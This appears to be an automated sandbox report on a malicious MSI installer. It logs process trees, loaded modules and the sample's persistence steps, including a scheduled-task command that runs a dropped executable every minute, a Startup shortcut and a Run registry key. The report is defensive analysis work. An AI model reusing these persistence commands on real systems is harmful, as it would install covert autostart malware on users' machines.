                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI77F6.tmp'
                Source: C:\Windows\Installer\MSI77F6.tmp | File read: C:\Users\desktop.ini
                Source: C:\Windows\Installer\MSI77F6.tmp | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: test.msi | ReversingLabs: Detection: 57%
                Source: test.msi | Virustotal: Detection: 61%
                Source: unknown | Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\test.msi"
                Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\Installer\MSI77F6.tmp "C:\Windows\Installer\MSI77F6.tmp"
                Source: C:\Windows\Installer\MSI77F6.tmp | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\Installer\MSI77F6.tmp | Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\PAITNR.vbs
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe "C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe"
                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: version.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: wsock32.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: linkinfo.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: ntshrui.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: cscapi.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\Installer\MSI77F6.tmpSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
                Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Section loaded: propsys.dll
                (The same set of modules, iphlpapi.dll through propsys.dll without apphelp.dll, is reported for five further ELJQZX.exe instances started by the scheduled task; the repeated entries are omitted here.)
                Source: C:\Windows\Installer\MSI77F6.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                Source: PAITNR.lnk.3.dr | LNK file: ..\..\..\..\..\Windata\ELJQZX.exe
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_008DA0C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,3_2_008DA0C0
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_008005A8 push ss; ret 3_2_008005A9
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_00797795 push ecx; ret 3_2_007977A8
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_003105A8 push ss; ret 8_2_003105A9
                Source: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe | Code function: 8_2_002A7795 push ecx; ret 8_2_002A77A8
                Source: initial sample | Static PE information: section name: UPX0 (reported twice)
                Source: initial sample | Static PE information: section name: UPX1 (reported twice)

                Persistence and Installation Behavior

                Source: C:\Windows\System32\msiexec.exe | Executable created and started: C:\Windows\Installer\MSI77F6.tmp
                Source: C:\Windows\Installer\MSI77F6.tmp | File created: C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe
                Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI77F6.tmp (reported twice)

                Boot Survival

                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn PAITNR.exe /tr C:\Users\user\AppData\Roaming\Windata\ELJQZX.exe /sc minute /mo 1
                Source: C:\Windows\Installer\MSI77F6.tmp | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PAITNR.lnk
                Source: C:\Windows\Installer\MSI77F6.tmp | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PAITNR (reported twice)
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_0078F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,3_2_0078F78E
                Source: C:\Windows\Installer\MSI77F6.tmp | Code function: 3_2_007D7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,3_2_007D7F0E
